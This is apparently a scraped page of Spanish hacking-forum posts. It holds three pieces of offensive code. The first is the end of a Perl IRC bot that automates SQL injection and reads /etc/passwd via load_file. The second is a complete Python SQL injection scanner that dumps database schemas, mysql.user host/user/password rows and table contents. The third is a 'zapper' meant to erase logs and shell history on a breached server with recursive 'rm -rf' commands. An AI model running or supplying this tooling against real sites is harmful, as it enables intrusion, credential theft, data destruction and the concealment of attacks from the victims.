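    my ($page, $modo) = @_;
    my ($pass1, $pass2) = bypass(defined $modo ? $modo : $ARGV[1]);

    # "by" is glued to the number on purpose: the syntax error it causes is
    # what makes a vulnerable page print one of the strings below.
    my $probe = toma($page . "-1" . $pass1 . "order" . $pass1 . "by" . "9999999999" . $pass2);

    # Full-path disclosure is captured here; the original read $1 much later,
    # after group-less regexes, so a stale $1 (the command argument) could be
    # printed as the path.
    my $path;
    if ($probe =~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /i) {
        $path = $1;
    }
    my $looks_sql = defined $path
        || $probe =~ /mysql_free_result/i
        || $probe =~ /mysql_fetch_assoc/i
        || $probe =~ /mysql_num_rows/i
        || $probe =~ /mysql_fetch_array/i
        || $probe =~ /mysql_query/i
        || $probe =~ /equivocado en su sintax/i
        || $probe =~ /You have an error in your SQL syntax/i
        || $probe =~ /Call to undefined function/i;
    return unless $looks_sql;

    my $code1 = toma($page . "-1" . $pass1 . "union" . $pass1 . "select" . $pass1 . "666" . $pass2);
    return unless $code1 =~ /The used SELECT statements have a different number of columns/i;

    my $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
    my $total = "1";
    my $asc   = "";
    for my $rows (2 .. 52) {
        $asc   .= "," . "char(" . ascii("RATSXPDOWN" . $rows . "RATSXPDOWN") . ")";
        $total .= "," . $rows;
        my $test = toma($page . "-1" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc);
        next unless $test =~ /RATSXPDOWN/;
        # Markers come back as RATSXPDOWN<n>RATSXPDOWN with no spaces; the
        # original pattern had a space on each side of <n> and never matched.
        my @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
        print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
        print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
        print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
        next unless @number;
        if (defined $path) {
            print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
        }
        # replace the first echoing column with the placeholder details() splits on
        $total =~ s/$number[0]/hackman /;
        print $soquete "PRIVMSG $canal : [+] Injection SQL : " . $page . "-1" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "\r\n";
        details($page . "-1" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, $modo);
        last;
    }
    return;
}

# details(injection [, bypass]): with the working UNION from scan2(), test
# whether information_schema, mysql.user and load_file(/etc/passwd) are
# readable, then post version(), database() and user(). ERTOR854 is the
# marker the char(...) sequences spell out.
sub details {
    my ($page, $modo) = @_;
    my ($pass1, $pass2) = bypass(defined $modo ? $modo : $ARGV[1]);
    return unless $page =~ /(.*)hackman(.*)/i;
    my ($start, $end) = ($1, $2);

    my $test1 = toma($start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2);
    my $test2 = toma($start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2);
    my $test3 = toma($start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2);

    if ($test2 =~ /ERTOR854/i) {
        print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
    }
    if ($test1 =~ /ERTOR854/i) {
        print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
    }
    if ($test3 =~ /ERTOR854/i) {
        print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
    }

    my $code = toma($start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))" . $end . $pass2);
    if ($code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/) {
        print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
        print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
        print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
    } else {
        print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
    }
    print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
    return;
}

# bypass(style): (separator, comment) pair used to build the injections.
# The default branch was lost with the sub's closing brace in this copy;
# "+"/"--" is the default the author's other scanners fall back to, and
# without it an unset $ARGV[1] produced "-1unionselect..." with no separators.
sub bypass {
    my ($modo) = @_;
    return ("/**/", "/*") if defined $modo && $modo eq "/*";
    return ("%20", "%00") if defined $modo && $modo eq "%20";
    return ("+", "--");
}

# ascii(string): comma-separated ordinals, e.g. "AB" -> "65,66".
# Reconstructed: the posted body was empty; scan2() wraps the result in
# char(...), which fixes this format.
sub ascii {
    my ($string) = @_;
    return join ',', map { ord $_ } split //, $string;
}

# ascii_de(string): inverse of ascii(); non-numeric fields are skipped.
# Reconstructed (posted body was empty).
sub ascii_de {
    my ($string) = @_;
    return join '', map { chr $_ } grep { /^\d+$/ } split /,/, $string;
}

# encode(string): "0x" + hex of every byte. Only the "0x" prefix line of the
# body survived the paste; the rest is reconstructed.
sub encode {
    my ($string) = @_;
    my $hex = '0x';
    $hex .= unpack 'H*', $string;
    return $hex;
}

# decode(hexstring): inverse of encode(); the prefix is optional. Only the
# prefix-stripping line survived the paste; the original edited the caller's
# variable in place, this returns the decoded bytes.
sub decode {
    my ($hex) = @_;
    $hex =~ s/^0x//;
    return pack 'H*', $hex;
}

# toma(url): GET and return the body.
sub toma {
    my ($url) = @_;
    return $nave->request(GET $url)->content;
}

# tomax(url): GET and return the HTTP::Response (callers test ->is_success).
sub tomax {
    my ($url) = @_;
    return $nave->request(GET $url);
}

#The End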
Programación / Scripting / Re: Como me hago un mIRC propio en python?
en: 7 Octubre 2011, 02:02 am
Es complicado: tenés que conocer los comandos necesarios, como el típico PING/PONG y otros; además no se me ocurre cómo detectar, dentro de un while, los mensajes privados que te puedan enviar. Desde mi punto de vista es complicado, pero por lo que he leído es muy fácil hacerlo en Delphi. Eso sí: si lo que querés hacer es un bot y no un cliente, la cosa es diferente.
Programación / Scripting / [Python] SQL Scanner 0.3
en: 7 Octubre 2011, 01:40 am
Bueno, este es un simple scanner en Python que hice para SQLi, con las siguientes opciones:
- Verifica la vulnerabilidad
- Busca las columnas
- Busca el número "milagroso" (la columna que imprime datos) y saca información sobre la DB
- Saca tablas y columnas de la DB actual o de otra externa
- Dumpea usuarios (mysql.user)
- Guarda todo en un log con el nombre de la web en la carpeta /logs
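#!/usr/bin/python
# SQL Scanner 0.3 (C) Doddy Hackman 2010
#
# Interactive MySQL UNION-based injection helper (Python 2: print statement,
# raw_input, urllib2). Flow: sta() asks for a URL that ends in the injectable
# parameter plus a comment style, scan() confirms the column-count error,
# findlength() finds the column count and the column that echoes, then
# menu() drives the information_schema / mysql.user / dump queries. Every
# result is appended to logs/<host>.txt.
#
# Review notes on this copy:
#  - logs/ is created on first write (the original raised IOError when the
#    directory did not exist yet).
#  - menu() read the option with input(), which evaluates whatever is typed
#    as Python; it now parses an integer from raw_input().
#  - the echoing column was substituted with re.sub(), which also replaced
#    the digit inside other column numbers ("1" in "11"); it is replaced
#    token-wise now.
#  - errors inside a menu action are printed instead of being swallowed by a
#    bare except that silently redrew the menu, and the menu is a loop rather
#    than unbounded recursion.

import os, sys, urllib2, re, binascii
from urlparse import urlparse

# seconds a single request may take; the original had no timeout, so one
# hung target froze the whole session
TIMEOUT = 15


def clean():
    """Clear the terminal (cls on Windows, clear elsewhere)."""
    if sys.platform == "win32":
        os.system("cls")
    else:
        os.system("clear")


def savefile(name, text):
    """Append `text`, surrounded by blank lines, to the log file `name`.

    The parent directory is created on demand.
    """
    folder = os.path.dirname(name)
    if folder and not os.path.isdir(folder):
        os.makedirs(folder)
    handle = open(name, "a")
    try:
        handle.write("\n" + text + "\n")
    finally:
        handle.close()


def gethost(test):
    """host[:port] part of a URL; used as the per-target log file name."""
    return urlparse(test).netloc


def header():
    print "\n--== SQL Scanner ==--\n"


def copyright():
    """Print the credits and terminate (exit status 1, as in the original)."""
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)


def show():
    """Usage line; not reached from the interactive flow below."""
    print "\n[*] Sintax : ", sys.argv[0], " <web>\n"


def toma(web):
    """GET `web` with a browser-like User-Agent and return the body."""
    nave = urllib2.Request(web)
    nave.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')
    op = urllib2.build_opener()
    return op.open(nave, timeout=TIMEOUT).read()


def bypass(bypass):
    """Map the comment style typed by the operator to (separator, suffix).

    "/*" gives ("/**/", "/*"); "--" and anything unrecognised give ("+", "--").
    """
    if bypass == "--":
        return ("+", "--")
    elif bypass == "/*":
        return ("/**/", "/*")
    else:
        return ("+", "--")


def _grab(mark, code):
    """First value wrapped as <mark>value<mark> in `code`, or None."""
    found = re.findall(mark + "(.*?)" + mark, code)
    if found:
        return found[0]
    return None


def dumper(web, passx, table, col1, col2):
    """Count the rows of `table`, then pull col1/col2 one row per request."""
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241,0x4B3042524131," + col2 + ",0x4B3042524131)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + table + pass2)
    print "\n\n[+] Searching values\n\n"
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] Values Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + table + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        c1 = _grab("K0BRA", code2)
        # K0BRA is a prefix of K0BRA1, so a col1 value that starts with "1"
        # can cut this second capture short; kept as in the original
        c2 = _grab("K0BRA1", code2)
        if c1 is None or c2 is None:
            continue
        print "[" + col1 + "] : " + c1
        print "[" + col2 + "] : " + c2 + "\n"
        savefile("logs/" + gethost(web) + ".txt", "[" + col1 + "] : " + c1)
        savefile("logs/" + gethost(web) + ".txt", "[" + col2 + "] : " + c2 + "\n")


def mysqluser(web, passx):
    """Dump Host/User/Password from mysql.user (needs a privileged DB user)."""
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] mysql.user : ON"
    savefile("logs/" + gethost(web) + ".txt", "[+] mysql.user : ON")
    savefile("logs/" + gethost(web) + ".txt", "[+] Users Found : " + numbers + "\n")
    print "[+] Users Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "mysql.user" + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        host = _grab("K0BRA", code2)
        user = _grab("K0BRA1", code2)
        passw = _grab("K0BRA2", code2)
        if host is None or user is None or passw is None:
            continue
        savefile("logs/" + gethost(web) + ".txt", "[Host] : " + host)
        savefile("logs/" + gethost(web) + ".txt", "[User] : " + user)
        savefile("logs/" + gethost(web) + ".txt", "[Pass] : " + passw + "\n")
        print "[Host] : " + host
        print "[User] : " + user
        print "[Pass] : " + passw + "\n"


def showcolumnsdb(web, db, table, passx):
    """List the columns of `table` inside schema `db` via information_schema."""
    db_name, table_name = db, table
    db = "0x" + str(binascii.hexlify(db))
    table = "0x" + str(binascii.hexlify(table))
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + table + pass1 + "and" + pass1 + "table_schema=" + db + pass2)
    print "\n\n[+] Searching columns in DB\n\n"
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    # log the names as typed; the original logged the hex literals under
    # two "[DB]" labels
    savefile("logs/" + gethost(web) + ".txt", "[DB] : " + db_name)
    savefile("logs/" + gethost(web) + ".txt", "[Table] : " + table_name)
    print "[+] information_schema : ON"
    print "[+] Columns Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + table + pass1 + "and" + pass1 + "table_schema=" + db + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        column = _grab("K0BRA", code2)
        if column is None:
            continue
        savefile("logs/" + gethost(web) + ".txt", "[Column Found] : " + column)
        print "[Column Found] : " + column


def showtablesdb(web, db, passx):
    """List the tables of schema `db` via information_schema."""
    db_name = db
    db = "0x" + str(binascii.hexlify(db))
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "where" + pass1 + "table_schema=" + db + pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    savefile("logs/" + gethost(web) + ".txt", "[DB] : " + db_name)
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] information_schema : ON"
    print "[+] Tables Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "where" + pass1 + "table_schema=" + db + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        table = _grab("K0BRA", code2)
        if table is None:
            continue
        print "[Table Found] : " + table
        savefile("logs/" + gethost(web) + ".txt", "[Table Found] : " + table)


def showtables(web, passx):
    """List every table name visible in information_schema.tables."""
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2)
    print "\n\n[+] Searching tables\n\n"
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] information_schema : ON"
    print "[+] Tables Found : ", numbers, "\n"
    # starts at 17, skipping the first rows of information_schema.tables -
    # presumably information_schema's own tables; kept from the original,
    # not verified
    for counter in range(17, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        table = _grab("K0BRA", code2)
        if table is None:
            continue
        print "[Table Found] : " + table
        savefile("logs/" + gethost(web) + ".txt", "[Table Found] : " + table)


def showcolumns(tabla, web, passx):
    """List the columns of `tabla` (any schema) via information_schema."""
    pass1, pass2 = bypass(passx)
    table_name = tabla
    tabla = "0x" + str(binascii.hexlify(tabla))
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tabla + pass2)
    print "\n\n[+] Searching tables\n\n"
    savefile("logs/" + gethost(web) + ".txt", "[Table Found] : " + table_name)
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] information_schema : ON"
    print "[+] Columns Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tabla + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        column = _grab("K0BRA", code2)
        if column is None:
            continue
        print "[Column Found] : " + column
        savefile("logs/" + gethost(web) + ".txt", "[Column Found] : " + column)


def showdbs(web, passx):
    """List schema names from information_schema.schemata."""
    pass1, pass2 = bypass(passx)
    web1 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))", web)
    web2 = re.sub("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))", web)
    code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.schemata" + pass2)
    print "\n\n[+] Searching DBS\n\n"
    numbers = _grab("K0BRA", code1)
    if numbers is None:
        print "[-] Not Found\n"
        return
    print "[+] information_schema : ON"
    print "[+] DBS Found : ", numbers, "\n"
    for counter in range(0, int(numbers)):
        code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.schemata" + pass1 + "limit" + pass1 + repr(counter) + ",1" + pass2)
        db = _grab("K0BRA", code2)
        if db is None:
            continue
        print "[DB Found] : " + db
        savefile("logs/" + gethost(web) + ".txt", "[DB Found] : " + db)


def menu(page, bypass):
    """Interactive menu for a confirmed injection.

    `page` is the working UNION URL with "hackman" in the echoing column and
    `bypass` is the comment style string (the parameter shadows the function
    of the same name inside this body; the helpers receive it as a string).
    Option 11 exits the program; option 10 restarts from sta().
    """
    while True:
        clean()
        header()
        print "\n[+] Target : ", page, "\n"
        print "\n[information_schema]\n\n"
        print "1 - Show tables\n"
        print "2 - Show columns of the a table\n"
        print "3 - Show databases\n"
        print "4 - Show tables from the a DB\n"
        print "5 - Show columns from the a table of the DB\n"
        print "\n[mysql.user]\n\n"
        print "6 - Show users\n"
        print "\n[Others]\n\n"
        print "7 - Show details\n"
        print "8 - Dump data\n"
        print "9 - Show log\n"
        print "10 - Change target\n"
        print "11 - Exit\n\n"
        try:
            # int(raw_input()) instead of input(): the latter eval()s the
            # typed text
            op = int(raw_input("[Option] : "))
        except ValueError:
            continue
        if op == 11:
            copyright()
        try:
            if op == 1:
                showtables(page, bypass)
            elif op == 2:
                table = raw_input("\n\n[Table] : ")
                showcolumns(table, page, bypass)
            elif op == 3:
                showdbs(page, bypass)
            elif op == 4:
                db = raw_input("\n\n[DB] : ")
                showtablesdb(page, db, bypass)
            elif op == 5:
                db = raw_input("\n\n[DB] : ")
                table = raw_input("\n\n[Table] : ")
                showcolumnsdb(page, db, table, bypass)
            elif op == 6:
                mysqluser(page, bypass)
            elif op == 7:
                more(page, bypass)
            elif op == 8:
                table = raw_input("\n\n[Table] : ")
                col1 = raw_input("\n\n[Column 1] : ")
                col2 = raw_input("\n\n[Column 2] : ")
                dumper(page, bypass, table, col1, col2)
            elif op == 9:
                # Windows-only viewer, as in the original; the file name is
                # derived from the target host typed by the operator
                os.system("start logs/" + gethost(page) + ".txt")
                continue
            elif op == 10:
                sta()
            else:
                continue
        except Exception as err:
            print "\n[-] Error :", err
        raw_input()


def more(web, passx):
    """Show user(), database() and version(), then test mysql.user and
    information_schema.tables for readability."""
    pass1, pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman", "unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))", web)
    code0 = toma(web1 + pass2)
    datax = _grab("3MP3Z4R", code0)
    if datax is not None:
        datar = re.split("K0BRA", datax)
        print "[+] Username :", datar[1]
        print "[+] Database :", datar[2]
        print "[+] Version :", datar[3], "\n"
        savefile("logs/" + gethost(web) + ".txt", "[+] Username : " + datar[1])
        savefile("logs/" + gethost(web) + ".txt", "[+] Database : " + datar[2])
        savefile("logs/" + gethost(web) + ".txt", "[+] Version : " + datar[3] + "\n")
    code1 = toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2)
    if re.findall("K0BRA", code1):
        print "[+] mysql.user : on"
        savefile("logs/" + gethost(web) + ".txt", "[+] mysql.user : on")
    code2 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2)
    if re.findall("K0BRA", code2):
        print "[+] information_schema.tables : on"
        savefile("logs/" + gethost(web) + ".txt", "[+] information_schema.tables : on")


def findlength(web, passx):
    """Try UNION SELECT with 2..29 marked columns until one marker is echoed.

    The echoing column is replaced by the "hackman" placeholder the other
    helpers substitute, the resulting URL is logged, and menu() takes over.
    """
    pass1, pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2, 30):
        number = str(number) + "," + "unhex(hex(concat(0x4b30425241," + str(te) + ",0x4b30425241)))"
        code = toma(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + number + pass2)
        numbers = re.findall("K0BRA(.*?)K0BRA", code)
        if numbers:
            print "[+] Column length :", te
            print "[+] Numbers", numbers, "print data"
            # token-wise substitution: re.sub("1", ...) also rewrote the "1"
            # inside "10".."19"
            columns = [str(i) for i in range(1, te + 1)]
            sqla = ",".join(["hackman" if c == numbers[0] else c for c in columns])
            savefile("logs/" + gethost(web) + ".txt", "[Target] : " + web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + sqla)
            menu(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + sqla, passx)
    print "[-] Length dont found\n"


def scan(web, passx):
    """Confirm the UNION column-count error, then hand over to findlength().

    Either way the program ends through copyright() once the scan is done.
    """
    pass1, pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + "1" + pass2)
    if re.findall("The used SELECT statements have a different number of columns", code, re.I):
        print "[+] SQLI Detected"
        findlength(web, passx)
    else:
        print "[-] Not Vulnerable"
    copyright()


def sta():
    """Entry point: ask for the target URL and comment style, then scan."""
    while True:
        clean()
        header()
        web = raw_input("\n\n[Page] : ")
        bypasx = raw_input("\n\n[Bypass] : ")
        scan(web, bypasx)


sta()
#The End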
Programación / Scripting / [Python] Zapper By Doddy H
en: 7 Octubre 2011, 01:39 am
Hola a todos. Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza a borrar huellas. Eso si , no me habia dado cuenta de que facil usar python xDD #!usr/bin/python #Zapper (C) Doddy Hackman import os paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"] comandos = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST'] print "\n[+] Starting the zapper" for path in paths : try : os.delete(path) except : pass for cmd in comandos : try: os.system(cmd) except: pass print "[+] All logs are erased\n" #The End ?